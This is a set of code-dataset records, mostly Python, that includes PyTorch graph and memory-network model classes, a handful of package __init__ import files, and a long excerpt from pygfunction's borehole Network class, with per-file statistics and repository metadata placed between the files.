h_hat = self.tanh(self.trans(joint_input))
output = (1 - z) * x_curt + z * h_hat
return output
class GCN(torch.nn.Module):
def __init__(self, cfg, arg):
super(GCN, self).__init__()
self.n_input = cfg["MODEL"]["NUM_WORD_EMB"]
self.hidden_dim = cfg["MODEL"]["NUM_HIDDEN"]
self.n_out = cfg["MODEL"]["NUM_OUT"]
self.i2e = ClassEmbedding(cfg)
self.q_gcn1 = DenseGCNConv(self.n_input, self.hidden_dim)
self.q_gcn2 = DenseGCNConv(self.hidden_dim, self.hidden_dim)
self.kg_gcn1 = DenseGCNConv(self.n_input, self.hidden_dim)
self.kg_gcn2 = DenseGCNConv(self.hidden_dim, self.hidden_dim)
self.fc_output = nn.Linear(self.hidden_dim * 2, self.n_out)
self.ans_selector = AnswerSelector(cfg)
def forward(self, batch):
ques_idxs = batch[0]
ques_adj = batch[1]
kg_idxs = batch[2]
kg_adj = batch[3]
ques_emb = self.i2e(ques_idxs)
kg_emb = self.i2e(kg_idxs)
ques_emb = self.q_gcn1(ques_emb, ques_adj)
ques_emb = self.q_gcn2(ques_emb, ques_adj)
ques_emb = torch.sum(ques_emb, axis=1)
kg_emb = self.q_gcn1(kg_emb, kg_adj)
kg_emb = self.q_gcn2(kg_emb, kg_adj)
kg_emb = torch.sum(kg_emb, axis=1)
last_kg = torch.cat([kg_emb, ques_emb], dim=1)
output = self.fc_output(last_kg)
pred = self.ans_selector(output)
return pred
class DenseGCNConv(torch.nn.Module):
def __init__(self, in_channels, out_channels, improved=False, bias=True):
super(DenseGCNConv, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.improved = improved
self.weight = nn.Parameter(torch.Tensor(self.in_channels, self.out_channels))
self.register_parameter("gcn_weight", self.weight)
if bias:
self.bias = nn.Parameter(torch.Tensor(self.out_channels))
self.register_parameter("gcn_bias", self.bias)
self.reset_parameters()
def reset_parameters(self):
utils.glorot(self.weight)
utils.zeros(self.bias)
def forward(self, x, adj, mask=None, add_loop=True):
x = x.float()
adj = adj.float()
x = x.unsqueeze(0) if x.dim() == 2 else x
adj = adj.unsqueeze(0) if adj.dim() == 2 else adj
B, N, _ = adj.size()
if add_loop:
adj = adj.clone()
idx = torch.arange(N, dtype=torch.long, device=adj.device)
adj[:, idx, idx] = 1 if not self.improved else 2
out = torch.matmul(x, self.weight)
deg_inv_sqrt = adj.sum(dim=-1).clamp(min=1).pow(-0.5)
adj = deg_inv_sqrt.unsqueeze(-1) * adj * deg_inv_sqrt.unsqueeze(-2)
out = torch.matmul(adj, out)
if self.bias is not None:
out = out + self.bias
if mask is not None:
out = out * mask.view(B, N, 1).to(x.dtype)
return out
class MemNet(nn.Module):
def __init__(self, cfg, args):
super(MemNet, self).__init__()
self.cfg = cfg
self.args = args
self.n_steps = cfg["MODEL"]["NUM_STEP"]
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["DROPOUT"])
self.i2e_ab = ClassEmbedding(cfg)
if cfg["MODEL"]["SHARE_FLAG"] == True:
self.i2e_c = self.i2e_ab
else:
self.i2e_c = ClassEmbedding(cfg)
self.ans_selector = AnswerSelector(cfg)
def forward(self, batch):
q = batch[0]
x = batch[1]
bs = x.size(0)
story_len = x.size(1)
s_sent_len = x.size(2)
x = x.view(bs * story_len, -1)
u = self.dropout(self.i2e_ab(q))
u = torch.sum(torch.sum(u, 1), 1)
for k in range(self.n_steps):
m = self.dropout(self.i2e_ab(x))
m = m.view(bs, story_len, s_sent_len, -1)
m = torch.sum(m, 2)
c = self.dropout(self.i2e_c(x))
c = c.view(bs, story_len, s_sent_len, -1)
c = torch.sum(c, 2)
p = torch.bmm(m, u.unsqueeze(2))
p = torch.bmm(m, u.unsqueeze(2)).squeeze(2)
p = F.softmax(p, -1).unsqueeze(1)
o = torch.bmm(p, c).squeeze(1)
u = o + u
pred = self.ans_selector(u)
return pred
| 34.768041
| 88
| 0.590393
| 5,010
| 33,725
| 3.666467
| 0.05489
| 0.037019
| 0.031738
| 0.03593
| 0.814252
| 0.786597
| 0.766019
| 0.752137
| 0.728946
| 0.698405
| 0
| 0.015749
| 0.282669
| 33,725
| 969
| 89
| 34.803922
| 0.743552
| 0.013758
| 0
| 0.651882
| 0
| 0
| 0.048124
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047043
| false
| 0
| 0.008065
| 0
| 0.100806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
56dac5251f133c64a12089bcda267a15d29def2b
| 468
|
py
|
Python
|
FSMSIM/expr/__init__.py
|
FSMSIM/FSMSIM
|
a3069c07aeca6e814519871f4c93a88da32c9e1d
|
[
"BSD-3-Clause"
] | null | null | null |
FSMSIM/expr/__init__.py
|
FSMSIM/FSMSIM
|
a3069c07aeca6e814519871f4c93a88da32c9e1d
|
[
"BSD-3-Clause"
] | null | null | null |
FSMSIM/expr/__init__.py
|
FSMSIM/FSMSIM
|
a3069c07aeca6e814519871f4c93a88da32c9e1d
|
[
"BSD-3-Clause"
] | null | null | null |
from FSMSIM.expr.and_expr import *
from FSMSIM.expr.arr_access_expr import *
from FSMSIM.expr.arr_expr import *
from FSMSIM.expr.bool_expr import *
from FSMSIM.expr.concat_expr import *
from FSMSIM.expr.eq_expr import *
from FSMSIM.expr.expr import *
from FSMSIM.expr.neq_expr import *
from FSMSIM.expr.or_expr import *
from FSMSIM.expr.output_expr import *
from FSMSIM.expr.slice_expr import *
from FSMSIM.expr.string_expr import *
from FSMSIM.expr.var_expr import *
| 33.428571
| 41
| 0.805556
| 78
| 468
| 4.666667
| 0.205128
| 0.357143
| 0.5
| 0.659341
| 0.807692
| 0.148352
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 468
| 13
| 42
| 36
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
56ed7b70c736304145d364e21ae3a47c385704aa
| 185
|
py
|
Python
|
src/safe_env/envloader/resourcehandlers/__init__.py
|
antonsmislevics/safe-env
|
8727bda0b3a0010f0653dbfe824910ac69e27007
|
[
"MIT"
] | null | null | null |
src/safe_env/envloader/resourcehandlers/__init__.py
|
antonsmislevics/safe-env
|
8727bda0b3a0010f0653dbfe824910ac69e27007
|
[
"MIT"
] | null | null | null |
src/safe_env/envloader/resourcehandlers/__init__.py
|
antonsmislevics/safe-env
|
8727bda0b3a0010f0653dbfe824910ac69e27007
|
[
"MIT"
] | null | null | null |
from .baseresourcehandler import BaseResourceHandler
from .azurerestresourcehandler import AzureRESTResourceHandler
# from .delayedloadresourcehandler import DelayedLoadResourceHandler
| 46.25
| 68
| 0.908108
| 12
| 185
| 14
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07027
| 185
| 3
| 69
| 61.666667
| 0.976744
| 0.356757
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
710132cbfff19df39799b7869cd4c7d79e4d40b1
| 183
|
py
|
Python
|
pymensago/__init__.py
|
darkwyrm/pymensago
|
add93a6a87def3b6909666d23b8d885cfbdee5c4
|
[
"MIT"
] | 1
|
2021-10-01T01:35:19.000Z
|
2021-10-01T01:35:19.000Z
|
pymensago/__init__.py
|
darkwyrm/pymensago
|
add93a6a87def3b6909666d23b8d885cfbdee5c4
|
[
"MIT"
] | null | null | null |
pymensago/__init__.py
|
darkwyrm/pymensago
|
add93a6a87def3b6909666d23b8d885cfbdee5c4
|
[
"MIT"
] | null | null | null |
from . import auth
from . import client
from . import encryption
from . import keycard
from . import serverconn
from . import userprofile
from . import utils
from . import workspace
| 18.3
| 25
| 0.775956
| 24
| 183
| 5.916667
| 0.416667
| 0.56338
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180328
| 183
| 9
| 26
| 20.333333
| 0.946667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
855b2401d94fcb40c1fa7d991626e5fe6f11bc9e
| 377
|
py
|
Python
|
compose/config/__init__.py
|
pareshmg/compose
|
cba758361499d74ef26bf281b73206e6dc12b5c9
|
[
"Apache-2.0"
] | 2
|
2020-07-30T04:04:04.000Z
|
2020-07-31T10:40:58.000Z
|
compose/config/__init__.py
|
pareshmg/compose
|
cba758361499d74ef26bf281b73206e6dc12b5c9
|
[
"Apache-2.0"
] | 38
|
2021-07-19T21:08:06.000Z
|
2022-03-28T21:11:05.000Z
|
compose/config/__init__.py
|
pareshmg/compose
|
cba758361499d74ef26bf281b73206e6dc12b5c9
|
[
"Apache-2.0"
] | 3
|
2020-09-22T02:56:37.000Z
|
2021-03-15T10:31:24.000Z
|
# flake8: noqa
from . import environment
from .config import ConfigurationError
from .config import DOCKER_CONFIG_KEYS
from .config import find
from .config import is_url
from .config import load
from .config import merge_environment
from .config import merge_labels
from .config import parse_environment
from .config import parse_labels
from .config import resolve_build_args
| 29
| 38
| 0.840849
| 54
| 377
| 5.703704
| 0.351852
| 0.324675
| 0.519481
| 0.262987
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00303
| 0.124668
| 377
| 12
| 39
| 31.416667
| 0.930303
| 0.03183
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a46fd343c2794f05050d0035da6da1144ce2de51
| 106
|
py
|
Python
|
erp_reloaded/mixins/models.py
|
martinlehoux/erp-reloaded
|
db7dea603095dec558f4b0ad9a0d2dbd20f8703c
|
[
"MIT"
] | null | null | null |
erp_reloaded/mixins/models.py
|
martinlehoux/erp-reloaded
|
db7dea603095dec558f4b0ad9a0d2dbd20f8703c
|
[
"MIT"
] | 5
|
2021-04-08T18:54:04.000Z
|
2021-06-10T18:37:26.000Z
|
erp_reloaded/mixins/models.py
|
martinlehoux/erp-reloaded
|
db7dea603095dec558f4b0ad9a0d2dbd20f8703c
|
[
"MIT"
] | null | null | null |
class Person:
@property
def full_name(self):
return f"{self.first_name} {self.last_name}"
| 21.2
| 52
| 0.650943
| 15
| 106
| 4.4
| 0.733333
| 0.242424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.226415
| 106
| 4
| 53
| 26.5
| 0.804878
| 0
| 0
| 0
| 0
| 0
| 0.320755
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
f17e59768d3999b726bce02fff67a40ecc6a0d94
| 53,997
|
py
|
Python
|
pygfunction/networks.py
|
j-c-cook/pygfunction
|
73cb9292fc39a068bd3d4ebe66b07ec9c8903c8d
|
[
"BSD-3-Clause"
] | null | null | null |
pygfunction/networks.py
|
j-c-cook/pygfunction
|
73cb9292fc39a068bd3d4ebe66b07ec9c8903c8d
|
[
"BSD-3-Clause"
] | 2
|
2021-04-10T05:17:18.000Z
|
2021-08-10T22:08:54.000Z
|
pygfunction/networks.py
|
j-c-cook/pygfunction
|
73cb9292fc39a068bd3d4ebe66b07ec9c8903c8d
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
from scipy.linalg import block_diag
class Network(object):
"""
Class for networks of boreholes with series, parallel, and mixed
connections between the boreholes.
Contains information regarding the physical dimensions and thermal
characteristics of the pipes and the grout material in each boreholes, the
topology of the connections between boreholes, as well as methods to
evaluate fluid temperatures and heat extraction rates based on the work of
Cimmino (2018, 2019) [#Network-Cimmin2018]_, [#Network-Cimmin2019]_.
Attributes
----------
boreholes : list of Borehole objects
List of boreholes included in the bore field.
pipes : list of pipe objects
List of pipes included in the bore field.
bore_connectivity : list, optional
Index of fluid inlet into each borehole. -1 corresponds to a borehole
connected to the bore field inlet. If this parameter is not provided,
parallel connections between boreholes is used.
Default is None.
m_flow_network : float or array, optional
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits. This
parameter is used to initialize the coefficients if it is provided.
Default is None.
cp_f : float, optional
Fluid specific isobaric heat capacity (in J/kg.degC). This parameter is
used to initialize the coefficients if it is provided.
Default is None.
nSegments : int, optional
Number of line segments used per borehole. This parameter is used to
initialize the coefficients if it is provided.
Default is None.
Notes
-----
The expected array shapes of input parameters and outputs are documented
for each class method. `nInlets` and `nOutlets` are the number of inlets
and outlets to the network, and both correspond to the number of parallel
circuits. `nTotalSegments` is the sum of the number of discretized segments
along every borehole. `nBoreholes` is the total number of boreholes in the
network.
References
----------
.. [#Network-Cimmin2018] Cimmino, M. (2018). g-Functions for bore fields with
mixed parallel and series connections considering the axial fluid
temperature variations. Proceedings of the IGSHPA Sweden Research Track
2018. Stockholm, Sweden. pp. 262-270.
.. [#Network-Cimmin2019] Cimmino, M. (2019). Semi-analytical method for
g-function calculation of bore fields with series- and
parallel-connected boreholes. Science and Technology for the Built
Environment, 25 (8), 1007-1022.
"""
def __init__(self, boreholes, pipes, bore_connectivity=None,
m_flow_network=None, cp_f=None, nSegments=None):
self.b = boreholes
self.H_tot = sum([b.H for b in self.b])
self.nBoreholes = len(boreholes)
self.p = pipes
if bore_connectivity is None:
bore_connectivity = [-1]*self.nBoreholes
self.c = bore_connectivity
self.m_flow_network = m_flow_network
self.cp_f = cp_f
# Verify that borehole connectivity is valid
_verify_bore_connectivity(bore_connectivity, self.nBoreholes)
iInlets, nInlets, iOutlets, nOutlets, iCircuit = _find_inlets_outlets(
bore_connectivity, self.nBoreholes)
# Number of inlets and outlets in network
self.nInlets = nInlets
self.nOutlets = nOutlets
# Indices of inlets and outlets in network
self.iInlets = iInlets
self.iOutlets = iOutlets
# Indices of circuit of each borehole in network
self.iCircuit = iCircuit
# Initialize stored_coefficients
self._initialize_coefficients_connectivity()
self._initialize_stored_coefficients(m_flow_network, cp_f, nSegments)
def get_inlet_temperature(
self, T_f_in, T_b, m_flow_network, cp_f, nSegments):
"""
Returns the inlet fluid temperatures of all boreholes.
Parameters
----------
T_f_in : float or (1,) array
Inlet fluid temperatures into network (in Celsius).
T_b : float or (nTotalSegments,) array
Borehole wall temperatures (in Celsius). If a float is supplied,
the same temperature is applied to all segments of all boreholes.
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
T_f_in : (nBoreholes,) array
Inlet fluid temperature (in Celsius) into each borehole.
"""
# Build coefficient matrices
a_in, a_b = self.coefficients_inlet_temperature(
m_flow_network, cp_f, nSegments)
# Evaluate outlet temperatures
if np.isscalar(T_b):
T_b = np.tile(T_b, sum(self.nSegments))
T_f_in_borehole = a_in @ np.atleast_1d(T_f_in) + a_b @ T_b
return T_f_in_borehole
def get_outlet_temperature(self, T_f_in, T_b, m_flow_network, cp_f, nSegments):
"""
Returns the outlet fluid temperatures of all boreholes.
Parameters
----------
T_f_in : float or (1,) array
Inlet fluid temperatures into network (in Celsius).
T_b : float or (nTotalSegments,) array
Borehole wall temperatures (in Celsius). If a float is supplied,
the same temperature is applied to all segments of all boreholes.
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
T_f_out : (nBoreholes,) array
Outlet fluid temperatures (in Celsius) from each borehole.
"""
# Build coefficient matrices
a_in, a_b = self.coefficients_outlet_temperature(
m_flow_network, cp_f, nSegments)
# Evaluate outlet temperatures
if np.isscalar(T_b):
T_b = np.tile(T_b, sum(self.nSegments))
T_f_out = a_in @ np.atleast_1d(T_f_in) + a_b @ T_b
return T_f_out
def get_borehole_heat_extraction_rate(
self, T_f_in, T_b, m_flow_network, cp_f, nSegments):
"""
Returns the heat extraction rates of all boreholes.
Parameters
----------
T_f_in : float or (1,) array
Inlet fluid temperatures into network (in Celsius).
T_b : float or (nTotalSegments,) array
Borehole wall temperatures (in Celsius). If a float is supplied,
the same temperature is applied to all segments of all boreholes.
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
Q_b : (nTotalSegments,) array
Heat extraction rates along each borehole segment (in Watts).
"""
a_in, a_b = self.coefficients_borehole_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
if np.isscalar(T_b):
T_b = np.tile(T_b, sum(self.nSegments))
Q_b = a_in @ np.atleast_1d(T_f_in) + a_b @ T_b
return Q_b
def get_fluid_heat_extraction_rate(
self, T_f_in, T_b, m_flow_network, cp_f, nSegments):
"""
Returns the total heat extraction rates of all boreholes.
Parameters
----------
T_f_in : float or (1,) array
Inlet fluid temperatures into network (in Celsius).
T_b : float or (nTotalSegments,) array
Borehole wall temperatures (in Celsius). If a float is supplied,
the same temperature is applied to all segments of all boreholes.
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
Q_f : (nBoreholes,) array
Total heat extraction rates from each borehole (in Watts).
"""
a_in, a_b = self.coefficients_fluid_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
if np.isscalar(T_b):
T_b = np.tile(T_b, sum(self.nSegments))
Q_f = a_in @ np.atleast_1d(T_f_in) + a_b @ T_b
return Q_f
def get_network_inlet_temperature(
self, Q_t, T_b, m_flow_network, cp_f, nSegments):
"""
Returns the inlet fluid temperature of the network.
Parameters
----------
Q_t : float or (1,) array
Total heat extraction rate from the network (in Watts).
T_b : float or (nTotalSegments,) array
Borehole wall temperatures (in Celsius). If a float is supplied,
the same temperature is applied to all segments of all boreholes.
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
T_f_in : float or (1,) array
Inlet fluid temperature (in Celsius) into the network. The returned
type corresponds to the type of the parameter `Qt`.
"""
# Build coefficient matrices
a_q, a_b = self.coefficients_network_inlet_temperature(
m_flow_network, cp_f, nSegments)
# Evaluate outlet temperatures
if np.isscalar(T_b):
T_b = np.tile(T_b, sum(self.nSegments))
T_f_in = a_q @ np.atleast_1d(Q_t) + a_b @ T_b
if np.isscalar(Q_t):
T_f_in = T_f_in.item()
return T_f_in
def get_network_outlet_temperature(
self, T_f_in, T_b, m_flow_network, cp_f, nSegments):
"""
Returns the outlet fluid temperature of the network.
Parameters
----------
T_f_in : float or (1,) array
Inlet fluid temperatures into network (in Celsius).
T_b : float or (nTotalSegments,) array
Borehole wall temperatures (in Celsius). If a float is supplied,
the same temperature is applied to all segments of all boreholes.
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
T_f_out : float or (1,) array
Outlet fluid temperature (in Celsius) from the network. The
returned type corresponds to the type of the parameter `Tin`.
"""
# Build coefficient matrices
a_in, a_b = self.coefficients_network_outlet_temperature(
m_flow_network, cp_f, nSegments)
# Evaluate outlet temperatures
if np.isscalar(T_b):
T_b = np.tile(T_b, sum(self.nSegments))
T_f_out = a_in @ np.atleast_1d(T_f_in) + a_b @ T_b
if np.isscalar(T_f_in):
T_f_out = T_f_out.item()
return T_f_out
def get_network_heat_extraction_rate(
self, T_f_in, T_b, m_flow_network, cp_f, nSegments):
"""
Returns the total heat extraction rate of the network.
Parameters
----------
T_f_in : float or (1,) array
Inlet fluid temperatures into network (in Celsius).
T_b : float or (nTotalSegments,) array
Borehole wall temperatures (in Celsius). If a float is supplied,
the same temperature is applied to all segments of all boreholes.
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
Q_t : float or (1,) array
Heat extraction rate of the network (in Watts). The returned type
corresponds to the type of the parameter `Tin`.
"""
a_in, a_b = self.coefficients_network_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
if np.isscalar(T_b):
T_b = np.tile(T_b, sum(self.nSegments))
Q_t = a_in @ np.atleast_1d(T_f_in) + a_b @ T_b
if np.isscalar(T_f_in):
Q_t = Q_t.item()
return Q_t
def coefficients_inlet_temperature(self, m_flow_network, cp_f, nSegments):
"""
Build coefficient matrices to evaluate intlet fluid temperatures of all
boreholes.
Returns coefficients for the relation:
.. math::
\\mathbf{T_{f,borehole,in}} =
\\mathbf{a_{in}} T_{f,network,in}
+ \\mathbf{a_{b}} \\mathbf{T_b}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
a_in : (nBoreholes, 1,) array
Array of coefficients for inlet fluid temperature.
a_b : (nBoreholes, nTotalSegments,) array
Array of coefficients for borehole wall temperatures.
"""
# method_id for coefficients_inlet_temperature is 0
method_id = 0
# Check if stored coefficients are available
if self._check_coefficients(
m_flow_network, cp_f, nSegments, method_id):
a_in, a_b = self._get_stored_coefficients(method_id)
else:
# Update input variables
self._format_inputs(m_flow_network, cp_f, nSegments)
# Coefficient matrices for borehole inlet temperatures:
# [T_{f,b,in}] = [c_in]*[T_{f,n,in}] + [c_out]*[T_{f,b,out}]
c_in = self._c_in
c_out = self._c_out
# Coefficient matrices for borehole outlet temperatures:
# [T_{f,b,out}] = [A]*[T_{f,b,in}] + [B]*[T_{b}]
AB = list(zip(*[
self.p[i].coefficients_outlet_temperature(
self._m_flow_borehole[i],
self._cp_borehole[i],
self.nSegments[i])
for i in range(self.nBoreholes)]))
A = block_diag(*AB[0])
B = block_diag(*AB[1])
# Coefficient matrices for borehole inlet temperatures:
# [T_{f,b,in}] = [a_in]*[T_{f,n,in}] + [a_b]*[T_{b}]
ICA = np.eye(self.nBoreholes) - c_out @ A
a_in = np.linalg.solve(ICA, c_in)
a_b = np.linalg.solve(ICA, c_out @ B)
# Store coefficients
self._set_stored_coefficients(
m_flow_network, cp_f, nSegments, (a_in, a_b), method_id)
return a_in, a_b
def coefficients_outlet_temperature(self, m_flow_network, cp_f, nSegments):
"""
Build coefficient matrices to evaluate outlet fluid temperatures of all
boreholes.
Returns coefficients for the relation:
.. math::
\\mathbf{T_{f,borehole,out}} =
\\mathbf{a_{in}} T_{f,network,in}
+ \\mathbf{a_{b}} \\mathbf{T_b}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
a_in : (nBoreholes, 1,) array
Array of coefficients for inlet fluid temperature.
a_b : (nBoreholes, nTotalSegments,) array
Array of coefficients for borehole wall temperatures.
"""
# method_id for coefficients_outlet_temperature is 1
method_id = 1
# Check if stored coefficients are available
if self._check_coefficients(
m_flow_network, cp_f, nSegments, method_id):
a_in, a_b = self._get_stored_coefficients(method_id)
else:
# Update input variables
self._format_inputs(m_flow_network, cp_f, nSegments)
# Coefficient matrices for borehole inlet temperatures:
# [T_{f,b,in}] = [c_in]*[T_{f,n,in}] + [c_out]*[T_{f,b,out}]
c_in = self._c_in
c_out = self._c_out
# Coefficient matrices for borehole outlet temperatures:
# [T_{f,b,out}] = [A]*[T_{f,b,in}] + [B]*[T_{b}]
AB = list(zip(*[
self.p[i].coefficients_outlet_temperature(
self._m_flow_borehole[i],
self._cp_borehole[i],
self.nSegments[i])
for i in range(self.nBoreholes)]))
A = block_diag(*AB[0])
B = block_diag(*AB[1])
# Coefficient matrices for borehole outlet temperatures:
# [T_{f,b,out}] = [a_in]*[T_{f,n,in}] + [a_b]*[T_{b}]
IAC = np.eye(self.nBoreholes) - A @ c_out
a_in = np.linalg.solve(IAC, A @ c_in)
a_b = np.linalg.solve(IAC, B)
# Store coefficients
self._set_stored_coefficients(
m_flow_network, cp_f, nSegments, (a_in, a_b), method_id)
return a_in, a_b
def coefficients_network_inlet_temperature(
self, m_flow_network, cp_f, nSegments):
"""
Build coefficient matrices to evaluate intlet fluid temperature of the
network.
Returns coefficients for the relation:
.. math::
\\mathbf{T_{f,network,in}} =
\\mathbf{a_{q,f}} Q_{f}
+ \\mathbf{a_{b}} \\mathbf{T_b}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
a_qf : (1, 1,) array
Array of coefficients for total heat extraction rate.
a_b : (1, nTotalSegments,) array
Array of coefficients for borehole wall temperatures.
"""
# method_id for coefficients_network_inlet_temperature is 2
method_id = 2
# Check if stored coefficients are available
if self._check_coefficients(m_flow_network, cp_f, nSegments, method_id):
a_qf, a_b = self._get_stored_coefficients(method_id)
else:
# Coefficient matrices for network heat extraction rates:
# [Q_{tot}] = [b_in]*[T_{f,n,in}] + [b_b]*[T_{b}]
b_in, b_b = self.coefficients_network_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
# Coefficient matrices for network inlet temperature:
# [T_{f,n,in}] = [a_qf]*[Q_{tot}] + [a_b]*[T_{b}]
b_in_inv = np.linalg.inv(b_in)
a_qf = b_in_inv
a_b = -b_in_inv.dot(b_b)
# Store coefficients
self._set_stored_coefficients(
m_flow_network, cp_f, nSegments, (a_qf, a_b), method_id)
return a_qf, a_b
def coefficients_network_outlet_temperature(
self, m_flow_network, cp_f, nSegments):
"""
Build coefficient matrices to evaluate outlet fluid temperature of the
network.
Returns coefficients for the relation:
.. math::
\\mathbf{T_{f,network,out}} =
\\mathbf{a_{in}} T_{f,network,in}
+ \\mathbf{a_{b}} \\mathbf{T_b}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
